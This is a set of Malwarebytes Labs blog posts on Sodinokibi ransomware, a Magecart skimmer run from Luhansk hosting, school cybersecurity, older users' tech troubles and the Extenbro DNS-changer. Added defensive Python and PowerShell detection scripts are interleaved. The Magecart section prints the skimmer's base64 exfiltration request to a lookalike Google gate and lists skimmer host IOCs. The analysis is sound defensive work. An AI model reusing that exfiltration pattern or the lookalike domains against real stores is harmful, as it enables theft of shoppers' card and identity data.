Threat Spotlight: Sodinokibi ransomware attempts to fill GandCrab void

Sodinokibi, also known as Sodin and REvil, is hardly six months old, yet it has quickly become a topic of discussion among cybersecurity professionals because of its apparent connection with the infamous-but-now-defunct GandCrab ransomware.

On May 31, the threat actors behind GandCrab formally announced their retirement, detailing their plan to cease selling and advertising GandCrab in a dark web forum post.

“We are leaving for a well-deserved retirement,” a GandCrab RaaS administrator announced. (Courtesy of security researcher Damian on Twitter)

While many may have heaved sighs of relief, some expressed skepticism over whether the GandCrab team would truly leave behind their wildly successful money-making scheme. What followed was bleak anticipation of another ransomware operation—or a re-emergence of the group peddling new wares—taking over to fill the hole GandCrab left behind.

In a way, they were all right.

Enter Sodinokibi

Putting a spin on an old product is a concept not unheard of in legitimate business circles. Often, spinning involves creating a new name for the product, some tweaking of its existing features, and finding new influencers—“affiliates” in the case of ransomware-as-a-service operations—to use (and market) the product. In addition, threat actors would initially limit the new product’s availability and follow with a brand-new marketing campaign—all without changing the underlying product. In hindsight, it seems the GandCrab team has taken this route.

A month before the GandCrab retirement announcement, Cisco Talos researchers released information about a new ransomware called Sodinokibi. Attackers manually infected the target server after exploiting a zero-day vulnerability in its Oracle WebLogic application.

To date, six versions of Sodinokibi have been seen in the wild.

Sodinokibi versions, from the earliest (v1.0a), which was discovered on April 23, to the latest (v1.3), which was discovered July 8.

Based on our telemetry, Sodinokibi has spread wide to both businesses and consumers since GandCrab’s exit.

Business and consumer detection trends for Sodin/REvil, which Malwarebytes detects as Ransom.Sodinokibi.

Sodinokibi infection vectors

Like GandCrab, the Sodinokibi ransomware-as-a-service (RaaS) follows an affiliate revenue system, which allows other cybercriminals to spread it through several vectors:

  • Active exploitation of a vulnerability in Oracle WebLogic, officially named CVE-2019-2725
  • Malicious spam or phishing campaigns with links or attachments
  • Malvertising campaigns that lead to the RIG exploit kit, an avenue that GandCrab used before
  • Compromised or infiltrated managed service providers (MSPs), which are third-party companies that remotely manage the IT infrastructure and/or end-user systems of other companies, to push the ransomware en masse. This is done by accessing networks via Remote Desktop Protocol (RDP) and then using the MSP console to deploy the ransomware.

Although affiliates used these tactics to push GandCrab, too, many cybercriminals—nation-state actors included—have done the same to push their own malware campaigns.

Symptoms of Sodinokibi infection

Systems infected with Sodinokibi ransomware show the following symptoms:

Changed desktop wallpaper. Like any other ransomware, Sodinokibi changes the desktop wallpaper of affected systems into a notice, informing users that their files have been encrypted. The wallpaper has a blue background, as you can partially see from the screenshot above, with the text:

All of your files are encrypted!
Find {5-8 alpha-numeric characters}-readme.txt and follow instructions

Presence of ransomware note. The {5-8 alpha-numeric characters}-readme.txt file it’s referring to is the ransom note that comes with every ransomware attack. In Sodinokibi’s case, it looks like this:

The note contains instructions on how affected users can go about paying the ransom and how the decryption process works.

Screenshot of the TOR-only accessible website Sodinokibi victims were told to visit to make their payments

Encrypted files with a 5–8 character extension name. Sodinokibi encrypts certain files on local drives with the Salsa20 encryption algorithm, with each file renamed to include a pre-generated, pseudo-random alpha-numeric extension that’s five to eight characters long.

The extension name and the character string in the ransom note’s file name are the same. For example, if Sodinokibi has encrypted an image file and renamed it to paris2017.r4nd01, the corresponding ransom note will have the file name r4nd01-readme.txt.
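As an added example (not code from the original post), a small Python triage script that uses the note-name/extension pairing described above: it walks a directory tree for any {5-8 alphanumeric}-readme.txt note and reports how many files carry that note’s extension. The victim tree it builds in a temporary directory is constructed sample data, not real victim files.

```python
import os
import re
import tempfile

# Sodinokibi ransom note: the random 5-8 alphanumeric string that becomes the
# extension of encrypted files, followed by "-readme.txt" (from the write-up).
NOTE_NAME = re.compile(r"^([a-z0-9]{5,8})-readme\.txt$", re.IGNORECASE)


def traces_from_names(filenames):
    """Map each ransom-note extension found in `filenames` to the number of
    files carrying that extension.  Pure function, so it is easy to unit test."""
    extensions = {}
    for name in filenames:
        m = NOTE_NAME.match(name)
        if m:
            extensions.setdefault(m.group(1).lower(), 0)
    if not extensions:
        return {}
    for name in filenames:
        if NOTE_NAME.match(name):
            continue                      # the note itself is not an encrypted file
        ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
        if ext in extensions:
            extensions[ext] += 1
    return extensions


def find_sodinokibi_traces(root):
    """Walk `root` and report ransom-note extensions with their encrypted-file counts."""
    names = []
    for _dirpath, _dirs, files in os.walk(root):
        names.extend(files)
    return traces_from_names(names)


def demo():
    """Build a constructed victim tree in a temp dir and scan it.  The note name
    and the appended extension mirror the paris2017 / r4nd01 example above."""
    sample_files = (
        "r4nd01-readme.txt",
        "pics/paris2017.jpg.r4nd01",
        "pics/r4nd01-readme.txt",
        "src/main.cpp.r4nd01",
        "src/notes.txt",                  # an untouched file, must not be counted
    )
    with tempfile.TemporaryDirectory() as root:
        for rel in sample_files:
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write("constructed sample\n")
        return find_sodinokibi_traces(root)


if __name__ == "__main__":
    print(demo())   # {'r4nd01': 2}
```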

Sodinokibi looks for files that are mostly media- and programming-related, with the following extensions to encrypt:

  • .jpg
  • .jpeg
  • .raw
  • .tif
  • .png
  • .bmp
  • .3dm
  • .max
  • .accdb
  • .db
  • .mdb
  • .dwg
  • .dxf
  • .cpp
  • .cs
  • .h
  • .php
  • .asp
  • .rb
  • .java
  • .aaf
  • .aep
  • .aepx
  • .plb
  • .prel
  • .aet
  • .ppj
  • .gif
  • .psd

Deleted shadow copy backups and disabled Windows Startup Repair tool. Shadow copy (also known as Volume Snapshot Service, Volume Shadow Copy Service, or VSS) and Startup Repair are technologies inherent in the Windows OS. The former is “a snapshot of a volume that duplicates all of the data that is held on that volume at one well-defined instant in time,” according to Windows Dev Center. The latter is a recovery tool used to troubleshoot certain Windows problems.

Deleting shadow copies prevents users from restoring from backup when they find their files are encrypted by ransomware. Disabling the Startup Repair tool prevents users from attempting to fix system errors that may have been caused by a ransomware infection.

Other tricks up Sodinokibi’s sleeve

Ransomware doesn’t normally take advantage of zero-day vulnerabilities in its attacks—but Sodinokibi is not your average ransomware. It takes advantage of an elevation-of-privilege zero-day vulnerability in the Win32k component of Windows.

Designated as CVE-2018-8453, this flaw can grant Sodinokibi administrator access to the endpoints it infects. This means that it can conduct the same tasks as administrators on systems, such as disabling security software and other features that were meant to protect the system from malware.

CVE-2018-8453 was the same vulnerability that the FruityArmor APT exploited in its malware campaign last year.

New variants of Sodinokibi have also been found to use “Heaven’s Gate,” an old evasion technique used to execute 64-bit code on a 32-bit process, which allows malware to run without getting detected. We touched on this technique in early 2018 when we dissected an interesting cryptominer we captured in the wild.

Protect your system from Sodinokibi

Malwarebytes tracks Sodinokibi campaigns and protects users with a multi-layered approach using signature-less detection, nipping the attack in the bud before the infection chain even begins.

To mitigate, we also recommend that IT administrators do the following:

  • Deny public IPs access to RDP port 3389.
  • Replace your company’s ConnectWise ManagedITSync integration plug-in with the latest version before reconnecting your VSA server to the Internet.
  • Block SMB port 445. In fact, it’s sound security practice to block all unused ports.
  • Apply the latest Microsoft update packages.
  • In this vein, make sure all software on endpoints is up-to-date.
  • Limit the use of system administration tools to IT personnel or employees who need access only.
  • Disable macros in Microsoft Office products.
  • Regularly inform employees about threats that might be geared toward the organization’s industry or the company itself with reminders on how to handle suspicious emails, such as avoiding clicking on links or opening attachments if they’re not sure of the source.
  • Apply attachment filtering to email messages.
  • Regularly create multiple backups of data, preferably to devices that aren’t connected to the Internet.

Indicators of compromise (IOCs)

File hashes:

  • e713658b666ff04c9863ebecb458f174
  • bf9359046c4f5c24de0a9de28bbabd14
  • 177a571d7c6a6e4592c60a78b574fe0e

Stay safe, everyone!

The post Threat Spotlight: Sodinokibi ransomware attempts to fill GandCrab void appeared first on Malwarebytes Labs.

No man’s land: How a Magecart group is running a web skimming operation from a war zone

Our Threat Intelligence team has been monitoring the activities of a number of threat actors involved in the theft of credit card data. Often referred to under the Magecart moniker, these groups use simple pieces of JavaScript code (skimmers) typically injected into compromised e-commerce websites to steal data typed by unaware shoppers as they make their purchase.

During the course of an investigation into one campaign, we noticed the threat actors had taken some additional precautions to avoid disruption or takedowns. As such, we decided to have a deeper look into the bulletproof techniques and services offered by their hosting company.

What we found is an ideal breeding ground where criminals can operate with total impunity from law enforcement or actions from the security community.

The setup

Using servers hosted in battle-scarred Luhansk (also known as Lugansk), Ukraine, Magecart operators are able to operate outside the long arm of the law to conduct their web-skimming business, collecting a slew of information in addition to credit card details before it is all sent to “exfiltration gates.” Those web servers are set up to receive the stolen data so that the cards can be processed and eventually resold in underground forums.

We will take you through analysis of the skimmer, exfiltration gate, and hosting servers to show how this Magecart group operates, and which measures we are taking to protect our customers.

Skimmer analysis

The skimmer is injected into compromised Magento sites and tries to pass itself off as Google Analytics (google-anaiytic[.]com), a domain previously associated with the VisionDirect data breach.

Each hacked online store has its own skimmer located in a specific directory named after the site’s domain name. We also discovered a tar.gz archive, perhaps left behind by mistake, containing the usernames and passwords needed to log in to hundreds of Magento sites. These are the same sites that have been injected with this skimmer.

Looking for additional OSINT, we were able to find a PHP backdoor that we believe is being used on those hacked sites. It includes several additional shell scripts and perhaps skimmers as well (snif1.txt):

In the next step of our analysis, we will be looking at the exfiltration gate used to send the stolen data back to the criminals. This is an essential part that defines every skimmer and can help us better understand their backend infrastructure.

Exfiltration gate

A closer look at the skimmer code reveals the exfiltration gate (google.ssl.lnfo[.]cc), which is another Google lookalike.

The stolen data is Base64 encoded and sent to the exfiltration server via a GET request that looks like this:

GET /fonts.googleapis/savePing/?hash=udHJ5IjoiVVMiLCJsb2dpbjpndWVzdCXN0Iiw{trimmed}

The crooks will receive the data as a JSON file where each field contains the victim’s personal information in clear text:

The primary target here is the credit card information that can be immediately monetized. However, as seen above, skimmers can also collect much more data which, unlike a compromised card that can simply be replaced, is much more problematic to deal with. Indeed, names, addresses, phone numbers, and emails are extremely valuable data points for identity theft or spear phishing attacks.

Panel and bulletproof hosting

A closer look at the exfiltration gate reveals the login panel for this skimmer kit. It’s worth noting that both google.ssl.lnfo[.]cc and lnfo[.]cc redirect to the same login page.

lnfo[.]cc is utilizing name services provided by 1984 Hosting, an Iceland-based hosting provider that “will always go the extra mile to protect our customers’ civil rights, including the freedom of expression, the freedom of the press, the right to anonymity and privacy.” It’s quite likely the threat actors are taking advantage of that policy.

The corresponding hosting server (176.119.1[.]92) is located in Luhansk (also known as Lugansk), Ukraine.

A little bit of research on this city shows it is the capital of the unrecognized Luhansk People’s Republic (LPR), which declared its independence from Ukraine following the 2014 revolution ignited by the conflict between pro-European and pro-Russian supporters. It is part of a region also known as Donbass that has been the theater for an intense and ongoing war that has cost thousands of lives.

Amid this chaos, opportunists are offering up bulletproof hosting services for “grey projects” safe from the reach of European and American law enforcement. This is the case of bproof[.]host at 176.119.1[.]89, which advertises bulletproof IT services with VPS and dedicated servers in a private data center.

A host ripe with malware, skimmers, phishing domains

Choosing the ASN AS58271 “FOP Gubina Lubov Petrivna” located in Luhansk is no coincidence for the Magecart group behind this skimmer. In fact, on the same ASN at 176.119.1[.]70 is also another skimmer (xn--google-analytcs-xpb[.]com) using an internationalized domain name (IDN) that ties back to that same exfiltration gate.
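The two tricks this group relies on, lookalike hostnames (the typosquat google-anaiytic[.]com, the IDN xn--google-analytcs-xpb[.]com) and a base64 `hash` parameter on the savePing request, can both be checked from a proxy or web-server log. The following is an added example, not the skimmer’s or Malwarebytes’ code: the legitimate-host list, the edit-distance threshold and the JSON sample carried in the request are all assumptions chosen for the demonstration.

```python
import base64
import json
import unicodedata
from urllib.parse import unquote, urlsplit

# Genuine Google hostnames that the skimmer and gate domains in the write-up imitate.
LEGIT_HOSTS = ("google-analytics.com", "www.google-analytics.com", "fonts.googleapis.com")


def to_unicode_host(host):
    """Decode IDN (xn--) labels so the form a shopper would see can be compared."""
    try:
        return host.encode("ascii").decode("idna")
    except UnicodeError:
        return host


def skeleton(host):
    """Lower-case and strip diacritics, so an accented 'i' becomes a plain 'i'."""
    decomposed = unicodedata.normalize("NFKD", to_unicode_host(host))
    return "".join(c for c in decomposed if not unicodedata.combining(c)).lower()


def levenshtein(a, b):
    """Classic edit distance, used to catch typosquats such as a dropped or swapped letter."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(host, legit=LEGIT_HOSTS, max_distance=2):
    """Return the genuine host that `host` imitates, or None if it is genuine or unrelated."""
    host = host.lower()
    if host in legit:
        return None
    sk = skeleton(host)
    best = None
    for real in legit:
        d = levenshtein(sk, real)
        if d <= max_distance and (best is None or d < best[1]):
            best = (real, d)
    return best[0] if best else None


def decode_exfil_param(request_line):
    """For a GET to .../savePing/, base64-decode the `hash` parameter and parse it as JSON."""
    target = request_line.split()[1] if request_line.startswith("GET ") else request_line
    parts = urlsplit(target)
    if not parts.path.endswith("/savePing/"):
        return None
    token = None
    for pair in parts.query.split("&"):       # parsed by hand: parse_qs would turn '+' into ' '
        key, _, value = pair.partition("=")
        if key == "hash":
            token = unquote(value)
    if not token:
        return None
    token += "=" * (-len(token) % 4)          # restore padding the skimmer may have dropped
    try:
        return json.loads(base64.urlsafe_b64decode(token).decode("utf-8"))
    except ValueError:                        # binascii.Error and JSONDecodeError are subclasses
        return None


# Constructed stand-in for the skimmed record; the real request in the write-up is trimmed.
SAMPLE_DATA = {"country": "US", "login": "guest", "email": "buyer@example.com"}


def build_sample_request():
    """Produce a savePing request line carrying SAMPLE_DATA the way the skimmer encodes it."""
    raw = json.dumps(SAMPLE_DATA, separators=(",", ":")).encode("utf-8")
    token = base64.b64encode(raw).decode("ascii").rstrip("=")
    return f"GET /fonts.googleapis/savePing/?hash={token} HTTP/1.1"


if __name__ == "__main__":
    for h in ("google-anaiytic.com", "xn--google-analytcs-xpb.com", "google-analytics.com"):
        print(h, "->", lookalike_of(h))
    print(decode_exfil_param(build_sample_request()))
```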

In addition, that ASN is a hotspot for IDN-based phishing, in particular around cryptocurrency assets:

Bulletproof hosting services have long been a staple of cybercrime. For instance, the infamous Russian Business Network (RBN) ran a variety of malicious activities for a number of years.

Due to the very nature of such hosts, takedown operations are difficult. It’s not simply a case of a provider turning a blind eye to shady operations; rather, it is the core of their business model.

To protect our users against these threats, we are blocking all the domains and IP addresses we can find associated with skimmers and malware in general. We are also reporting the compromised Magento stores to their respective registrars/hosts.

Indicators of Compromise

Skimmers (hosts)
google-anaiytic[.]com (176.119.1[.]72)
xn--google-analytcs-xpb[.]com (176.119.1[.]70)

Skimmers (exfiltration gate/panel)
google.ssl.lnfo[.]cc (176.119.1[.]92)

Skimmers (JavaScript)


Compromising vital infrastructure: problems in education security continue

The educational system and many of its elements are targets for cybercriminals on a regular basis. While education is a fundamental human right recognized by the United Nations, the financial means of many schools and other entities in the global educational system are often limited.

These limited budgets often result in weak or less-than-adequate protection against cyberthreats. Unfortunately, organizations in this industry are forced to economize and cut the costs of security.

Record keepers

Schools by nature have a lot of personal data on record—not only about their students, but in most cases, they also have records of the parents, legal guardians, and other caretakers of the children they educate. And the nature of the data—grades, health information, and social security numbers, for example—makes them extremely valuable for phishing and other social engineering attacks.

Ransomware can also have a devastating effect on educational institutions, as some of the information, like grades for example, may not be recorded anywhere else. If they are destroyed or held for ransom without the availability of backups, the results can be disastrous.

Special circumstances

Organizations in the education industry have some special circumstances to deal with when trying to protect their data and networks:

  • Many schools use special software that allows their students to log in both on premise and remotely so they can view their grades and homework assignments. These applications occasionally get hacked by students.
  • Growing networks enlarge the attack surface. Modern education requires children of young ages to learn computer skills, so many students are connected to the institution’s network at once.
  • If a tech-savvy student wants a day off, claims that he couldn’t access his homework assignments, or simply wants to brag, what’s to stop him from organizing or paying for a DDoS attack? Kids will be kids.
  • Schools often also harbor a mix of IoT and BYOD devices, which each come with their own potential problems. Some schools have noticed a spike in malware detections after holiday breaks, when infected devices get introduced back into the school environment.

The sensitive nature of the data and having an open platform for students at the same time creates a difficult situation for many educational institutions. After all, it is easy to kick in a door that is already half open—especially if there is a wealth of personally identifiable information (PII) behind it.

The current situation

An analysis in December 2018 by SecurityScorecard ranked education as the worst in cybersecurity of 17 major industries. According to the study, the main areas of cybersecurity weaknesses in education are application security, endpoint security, patching cadence, and network security.

In our 2019 State of Malware report, we found education to be consistently in the top 10 industries targeted by cybercriminals. Looking only at Trojans and more sophisticated ransomware attacks, schools were even higher on the list, ranking as number one and number two, respectively.

So, it shouldn’t come as a surprise that according to a 2016 study entitled: The Rising Face of Cyber Crime: Ransomware, 13 percent of education organizations fall victim to ransomware attacks.

Malware strikes hard

Like many other organizations, educational institutions are under attack by the most active malware families, such as Emotet, TrickBot, and Ryuk, which wreaked havoc on organizations for the better part of the 2018–2019 school year.

Last May, the Coventry school district in Ohio had to send home its 2,000 students and close its doors for the duration of one day. The cause was probably a TrickBot infection, but the FBI is still busy with an ongoing investigation.

In February 2019, the Sylvan Union School District in California discovered a malware attack that made staff and teachers lose their connection to cloud-based data, networks, and educational platforms. Reportedly, they had to spend US$475,700 to clean up their networks.

On May 13, 2019, attackers infected the computer network of Oklahoma City Public Schools with ransomware, forcing the school district to shut down its network.

But it’s not just malware that educational institutions need to worry about. Scott County Schools in Kentucky paid US$3.7 million out to a phishing scam that posed as one of their vendors.

Unfortunately, that’s money many school districts, especially those in impoverished communities, cannot afford to pay out. So what can they do to get ahead of malware attacks before valuable data and funding fly out the bus window?

Recommended reading: What K–12 schools need to shore up cybersecurity


Given the complex situation and sensitive data most educational organizations have to deal with, there are a host of measures that should be taken to lower the risk of a costly incident. Recognizing that many schools must divert public funding to core curriculum, our recommendations represent a baseline level of protection districts should strive toward with limited resources.

  • Separate educational and organizational networks, with grades and curriculum in one place, and personal data in another. By using this infrastructure, it will be harder for cybercriminals to access personal data by using leaked or breached student and teacher accounts.
  • DDoS protection. DDoS attacks are so cheap ($10/hour) nowadays that anyone with a grudge can have an unprotected server taken down for a few days without spending a fortune. The possible scope of DDoS attacks has increased significantly now that attackers have started using Memcached-enabled servers. To put a stop to outrageously large DDoS attacks, those servers should not be Internet-facing.
  • Educate staff and students about the dangers they are facing and the possible consequences of not paying enough attention. Teachers can absorb cybersecurity education into reading comprehension lessons, and staff could benefit from awareness training during professional development days.
  • Lay out clear and concise regulations for the use of devices that belong to the organization and the way private devices are allowed to be used on the grounds.
  • Backups should be up-to-date and easy to deploy. Ransomware demands are high and even when you pay them, there is always the chance the decryption may fail—or never existed in the first place.
  • Investing in layered protection may seem costly, but compared to falling victim to malware or fraud, the investment is worth it.

In fact, all of these measures will cost money, and we realize that will need to come out of a tight budget. But funding, or the lack thereof, cannot be an excuse for weak security. Cybercrime is one of the biggest chunks of the modern economy. And guess who’s paying for most of that? Those who didn’t invest enough in security.

What a strange paradox that one of the best weapons against cybercrime is education, but that organizations in education have the biggest problems with security. We at Malwarebytes, with the help of educational leaders, aim to change that.

Stay safe, everyone!


Hi, honey. It’s mom. My phone is acting funny again.

Whether it’s setting up access to a Netflix account on a smart TV or enabling personal email on an iPhone, some people—of all ages—have a hard time figuring out user-friendly technology. However, oftentimes it’s older generations that have to turn to their progeny for everything from uploading pictures to the cloud to deciding whether it’s safe to open an attachment.

Despite results from a 2018 study from the Pew Research Center, which found that there has been “significant growth in tech adoption in recent years among older generations—particularly Gen Xers and Baby Boomers,” Millennials and Gen Zs field many “how do I?” technology questions from their aging parents.

While older generations are embracing technology, such as smart phones and smart TVs, the constant need to update “can be difficult for seniors to keep up with,” according to Senior Living. “Often seniors need help from caregivers or cell phone technicians to understand new features to their devices.”

The frustration from older users over rapidly-evolving new technology, updates to software, and a laundry list of security best practices to keep track of—like needing 27 different passwords—can lead to tech and security fatigue, which causes users to bury their heads in the sand instead of having to keep up with it all. What’s easier, then, is calling up a younger friend or family member for help.

That’s all well and good, but do younger generations always know the right thing to do? And are they sick of serving as the family IT guy? How can disparate generations reconcile their relationship with technology and with each other while still staying safe?

My phone is acting weird

When seniors experience user challenges, they most often turn to the Internet or their families for tech support, according to the 2019 Link-Age Connect Technology Study. Nicolas Poggi, who works for a software security firm in Santiago, Chile, agreed, explaining that his 54-year-old mother is constantly reaching out with questions about her phone.

“I think the main thing that keeps coming up is the fear that everything has a virus in it,” Poggi said. “I usually get a call or a sneaky message from Mom saying, ‘Hey, I think my phone has a virus or something. It’s acting odd, can you give me a hand?’”

Sometimes the problem is one of misconfigurations. “She’s misconfigured half of her settings by accident and the other half trying to fix the initial misconfigurations,” Poggi said, adding that his greatest technology concerns for his mother are privacy and security.

Yes, privacy and security are important concerns for most technology users, but Linkage Connect explained that when it comes to the elderly, “the biggest barriers that keep them from adopting new technology today are the complexity, understanding it all, the cost, and having no easy way to learn it.”

Scammers target older users

Verizon’s 2019 Data Breach Report found that 32 percent of data breaches involved phishing, where cybercriminals send emails pretending to be from reputable companies to coax people into revealing personal information, such as passwords and credit card numbers. Not surprisingly, young people are concerned that their aging parents could easily fall victim to a phish or some other type of fraudulent scam, especially because scammers are keen to target older users, whom they believe to be more vulnerable.

When asked about her perceived ability to detect fraud and scams, Poggi’s mom said, “I think there are obvious ones, like the email ones or those images that promise to make you a millionaire. Aside from that, I don’t really know what other types of scams are out there. It worries me that I don’t know what to look out for. I know how to keep my social media private, but I don’t really know who is looking at what or where.”

Poggi agrees with his mother’s assessment, but worries that the areas where she lacks awareness could lead to compromise.

“I don’t think their generation adopted technology in the way we have,” said Poggi. “They are way behind with best practices. Basic things like password hygiene, phishing, fake websites, fake offers, still get to them. Still, they seem to have adopted enough technology to make for an awfully dangerous combination: a lack of security plus online banking plus social media.”

I love my phone! I hate my phone!

Older generations are increasingly becoming major consumers of connected devices. In fact, 94 percent of Americans over the age of 50 use technology to stay connected with their friends and family members, according to the 2019 Tech and the 50+ Survey published by AARP.

Yet, many in the 50+ age group have a love-hate relationship with technology. The Linkage Connect survey covered a wide swath of participant ages—nearly half a century, actually. Some said they had no use for technology. Others said they couldn’t imagine life without it. Most respondents appreciated being able to use technology but found the learning curve frustrating.

“Finding time to learn to use and to fix technology is the biggest problem,” said one woman in the 75–79 age range.

A woman nearly 10 years her senior said, “I find it frustrating when setting up a new electronic device such as a printer, computer, phone, etc. Instructions are supposed to be simple, but there always seems to be something missed. Need a person to walk me through it.”

While others noted their reliance on family to help them navigate the complexities of their connected devices, one woman in her sixties said, “I find it interesting, but the advancements come so rapidly, it is hard to keep up. And the expense is ridiculous.”

Though technology admittedly makes some aspects of life simpler, another 75–79 year old woman said, “At times, I feel that if I have to learn one more thing I will scream, but it is keeping me current with the world.”

Convenience, affordability, and simplicity

According to AARP, technologies targeting “the health, wellness, safety, and vitality of adults 50-plus are proliferating.” Technology innovators obviously crunched the numbers from the Census Bureau in preparation for January’s CES 2019 in Las Vegas, where many of the devices introduced for older generations ranged from awesome to odd.

As people age, however, they want to make things simpler. Simplicity and ease of use should be the goal of technologies and devices that are designed for older generations. The Linkage Connect study noted that, “With the 50+ population representing approximately 115 million in the United States alone today and the expectation for that number to reach 132 million by 2030 (from the US Census Bureau), it is now more important than ever to understand the older adult consumer.”

No one wants to fumble through learning how to use a connected device. If it’s too challenging, it’s useless. Asking for help can be embarrassing for older generations who have to turn to their children or grandchildren to learn how to use a new gadget, which is one reason why the American Society on Aging advised, “It is imperative that in addition to making technology more intuitive for older adults, training older adults in how to use technology must be a national priority.”

What’s important to remember is that education needs to be accessible and personal—at any age. In order to enable adoption that improves the lives of elders, manufacturers and younger helpers need to meet them where they are.

“They want to learn ‘hands on’ with others. Teaching older adults how to use these devices, in the manner in which they want to learn, could prove to benefit them as they age,” the Linkage Connect study said.

Older adults who feel overwhelmed should feel free to take the initiative to ask for help. And younger family members or friends should be patient and take a beat to not only fix the problem, but walk people through it. In the end, both generations can benefit from the extra security awareness practice.


Meet Extenbro, a new DNS-changer Trojan protecting adware

Recently, we uncovered a new DNS-changer called Extenbro that comes with an adware bundler. These DNS-changers block access to security-related sites, so the adware victims can’t download and install security software to get rid of the pests.

From our viewpoint, this might be like sending in an elephant to save the mosquito, but the threat actors behind this attack have been known to use aggressive tactics in the past. What do they care if they open up your machine to all kinds of threats by disallowing you access to security sites and blocking any existing security software from getting updates? They just want to serve you adware.

Unfortunately, we have seen this kind of behavior before. But since this one uses a few fancy tricks, we’ll give you a quick overview of what it does and how you can get rid of it. For those just looking for a quick fix, there is a removal guide on our forums.

Infection vector

We have noticed the Extenbro Trojan is delivered on systems by a bundler that is detected by Malwarebytes as Trojan.IStartSurf.


First and foremost, the Trojan changes the DNS settings of the infected system so it won’t be able to reach any security vendors’ sites.

Advanced DNS

New for this one is that you have to open the Advanced DNS tab to find out that it has added four DNS servers rather than the usual two. People might be inclined to change only the two that are visible, which would leave the additional two in place; use the Advanced button and look at the DNS tab to find them.

Task Scheduler

Should you manage to correct the offending DNS servers and reboot the system before taking further measures, you will find that the DNS settings re-appear after a reboot. This is because of a randomly-named Scheduled Task that looks similar to this:

Scheduled Task

The location of the folder and the switches for the command seem to be fixed, but the folder name and file name are random.

Root certificate

The Trojan also adds a certificate to the set of Windows Root certificates.

new certificate

Using the method outlined in the blog post Learning PowerShell: some basic commands, I established that the certificate has no “Friendly Name” and is supposedly registered to abose[at]reddit[dot]com.

Disables IPv6

By changing the registry value DisabledComponents under the key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\TCPIP6\Parameters and setting it to “FF”, the Trojan disables IPv6 to force the system to use the new DNS servers.


The malware also makes a change in the Firefox user.js file and sets the security.enterprise_roots.enabled setting to true, which configures Firefox to use the Windows certificate store, where the newly-added root certificate now lives.


Removal instructions

Some of the changes that this malware makes could already be in place, if they are the user’s preferred settings. So feel free to skip the steps that you are not comfortable with.

What really needs to be done so you can download a removal tool or update your existing security software is to restore the DNS servers to what they were—or, if you don’t know the previous settings, to something safe. Most ISPs have the preferred DNS servers listed in their installation instructions or on their website. That is the first place to look. If you can’t find them there, you can use the DNS servers provided by OpenDNS. You can find instructions for many operating systems on their site.

An extra step needs to be taken when you are in this screen:

General DNS settings

Make sure to click on Advanced… and select the DNS tab to find the extra two DNS servers that we mentioned earlier. Remove those before you change the two shown on the screen to your preferred ones.

Now, you should be able to visit security sites again. Follow the remaining instructions below:

  • To get to your security sites, you may need a restart of the browser. Do NOT reboot your system or the DNS servers might be changed for the worse again by the Scheduled Task that belongs to the Trojan. If your existing solution does not pick up on the malware, download Malwarebytes to your desktop.
  • Double-click mb3-setup-consumer-{version}.exe and follow the prompts to install the program.
  • Then click Finish.
  • Once the program has fully updated, select Scan Now on the Dashboard. Or select the Threat Scan from the Scan menu.
  • If another update of the definitions is available, it will be implemented before the rest of the scanning procedure.
  • When the scan is complete, make sure that All Threats are selected, and click Remove Selected.
  • Restart your computer when prompted to do so.
  • This procedure should take care of the Scheduled Task and the Root certificate.
  • If you want to undo the change that makes Firefox adhere to the Windows certificates, you can open Firefox and type about:config in the address bar. Then read and accept the “risk” and search for security.enterprise_roots.enabled. The default setting is false. You can change the setting by selecting the line and right-clicking it to get a menu. Clicking Toggle changes the value back and forth between True and False. Close the about:config tab when you are done.
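To check a machine for the artifacts described above (the extra DNS servers, the re-applying Scheduled Task, the root certificate, the IPv6 registry change and the Firefox user.js setting) before following the removal steps, here is an added audit script. It is not code from the Malwarebytes post; the known-good DNS list is a placeholder to replace with your ISP's resolvers, and the e-mail string is the one the post reports for the certificate.

```powershell
# Added example (not from the Malwarebytes post): audits a Windows host for the
# Extenbro artifacts and prints what it finds. Run in an elevated PowerShell session.
# Placeholders: $KnownGoodDns (your ISP or resolver addresses); $ReportedEmail is the
# address the post reports for the rogue root certificate, written out undefanged.

$KnownGoodDns  = @('208.67.222.222', '208.67.220.220')   # placeholder: OpenDNS resolvers
$ReportedEmail = 'abose@reddit.com'                      # from the post's certificate description
$findings = New-Object 'System.Collections.Generic.List[string]'

# 1. DNS: the Trojan sets four servers per adapter; only two show on the main tab,
#    so flag any adapter with more than two servers or with servers not on the list.
Get-DnsClientServerAddress -AddressFamily IPv4 |
    Where-Object { $_.ServerAddresses.Count -gt 0 } |
    ForEach-Object {
        $alias      = $_.InterfaceAlias
        $servers    = @($_.ServerAddresses)
        $unexpected = $servers | Where-Object { $KnownGoodDns -notcontains $_ }
        if ($servers.Count -gt 2 -or $unexpected) {
            $findings.Add("DNS: adapter '$alias' has $($servers.Count) server(s): $($servers -join ', ')")
        }
    }

# 2. IPv6: the Trojan writes DisabledComponents = 0xFF to disable IPv6 entirely.
$tcpip6 = 'HKLM:\SYSTEM\CurrentControlSet\Services\TCPIP6\Parameters'
$dc = (Get-ItemProperty -Path $tcpip6 -Name DisabledComponents -ErrorAction SilentlyContinue).DisabledComponents
if ($dc -eq 0xFF) { $findings.Add("IPv6: DisabledComponents = 0x$('{0:X}' -f $dc) (IPv6 fully disabled)") }

# 3. Root store: the post's certificate had no Friendly Name and named an e-mail address.
Get-ChildItem Cert:\LocalMachine\Root |
    Where-Object { [string]::IsNullOrEmpty($_.FriendlyName) -or $_.Subject -match [regex]::Escape($ReportedEmail) } |
    ForEach-Object { $findings.Add("Root cert to review: '$($_.Subject)' thumbprint $($_.Thumbprint)") }

# 4. Scheduled tasks: the Trojan's task re-applies the DNS settings after a reboot and
#    runs a randomly named file from a randomly named folder, so list every task whose
#    executable lives outside the Windows and Program Files trees for review.
Get-ScheduledTask | ForEach-Object {
    $task = $_
    foreach ($action in $task.Actions) {
        if ($action.Execute -and
            $action.Execute -notmatch '^"?(%SystemRoot%|%windir%|C:\\Windows|C:\\Program Files)') {
            $findings.Add("Task '$($task.TaskPath)$($task.TaskName)' runs: $($action.Execute) $($action.Arguments)")
        }
    }
}

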